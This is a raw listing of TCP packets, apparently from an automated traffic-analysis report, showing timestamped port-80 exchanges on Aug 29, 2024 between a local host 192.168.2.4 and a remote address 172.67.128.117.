                                  Aug 29, 2024 23:42:06.784390926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784403086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784410954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784431934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784462929 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784495115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784504890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784519911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784531116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784540892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784564018 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784579992 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784890890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784928083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784936905 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784940004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784970045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784974098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784989119 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784989119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785017967 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785032988 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785121918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785171032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785180092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785192013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785229921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785243034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785245895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785257101 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785267115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785279989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785309076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785321951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785324097 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785353899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785370111 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785681009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785701036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785712957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785726070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785748005 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785763025 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785810947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785825014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785835981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785846949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785861015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785873890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785916090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785934925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785945892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785957098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785969973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785981894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785981894 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785998106 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.786022902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.786034107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.786034107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.786046982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.786072016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.786088943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.786976099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.786987066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.786997080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787024021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787050009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787060976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787071943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787075996 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787085056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787113905 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787113905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787131071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787133932 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787157059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787162066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787172079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787180901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787184000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787197113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787223101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787249088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787435055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787446022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787463903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787475109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787478924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787508965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787532091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.867687941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.867898941 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.867933035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.867949963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.867960930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.867979050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.867990971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.867995977 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868005991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868017912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868021965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868030071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868043900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868061066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868072987 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868074894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868088007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868098021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868098021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868118048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868145943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868459940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868470907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868489981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868515015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868530989 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868544102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868556023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868566990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868583918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868597984 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868608952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868638039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868649006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868649006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868662119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868671894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868700027 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868727922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868755102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868771076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868782997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868792057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868808031 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868834019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868844032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868849993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868863106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868871927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868895054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868937969 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036516905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036540985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036561966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036576033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036588907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036600113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036611080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036657095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036669970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036761999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036771059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036771059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036772966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036771059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036786079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036799908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036803961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036814928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036827087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036833048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036842108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036851883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036870956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036900997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036900997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036922932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036938906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036951065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036962032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036967039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036986113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037003040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037013054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037045956 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037058115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037069082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037070036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037090063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037096024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037126064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037127018 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037153006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037178993 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037211895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037225008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037235022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037247896 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037259102 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037261009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037288904 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037312031 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037486076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037497044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037508965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037520885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037528992 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037533045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037544966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037548065 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037558079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037570953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037580013 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037600040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037620068 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037707090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037720919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037734985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037745953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037769079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037806034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037857056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037868023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037878990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037890911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037909985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037929058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038014889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038026094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038043976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038054943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038062096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038065910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038079977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038090944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038104057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038105965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038119078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038134098 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038155079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038175106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038177013 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038187027 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038197994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038213968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038225889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038227081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038239002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038254023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038259983 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038269043 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038281918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038306952 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038331985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038523912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038536072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038544893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038556099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038568974 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038575888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038579941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038594961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038604975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038608074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038623095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038625956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038650990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038669109 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038809061 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038820982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038830996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038844109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038862944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038892984 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.038970947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038981915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.038992882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039014101 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039026976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039033890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039040089 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039047003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039060116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039066076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039078951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039083958 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039089918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039109945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039122105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039130926 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039135933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039148092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039150953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039160967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039172888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039186001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039189100 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039197922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039216042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039223909 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039247036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039259911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039266109 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039273024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039283991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039294004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039305925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039307117 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039319992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039328098 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039335012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039349079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039361000 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039382935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039402008 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039418936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039432049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039469004 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039524078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039535999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039546013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039561033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039570093 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039594889 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039640903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039666891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039676905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039683104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039694071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039705992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039725065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039730072 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039737940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039750099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.039774895 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039787054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.039793015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.125925064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.125946045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.125962019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.125974894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.125988007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.125998974 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126012087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126043081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126076937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126089096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126099110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126116991 CEST8049730172.67.128.117192.168.2.4
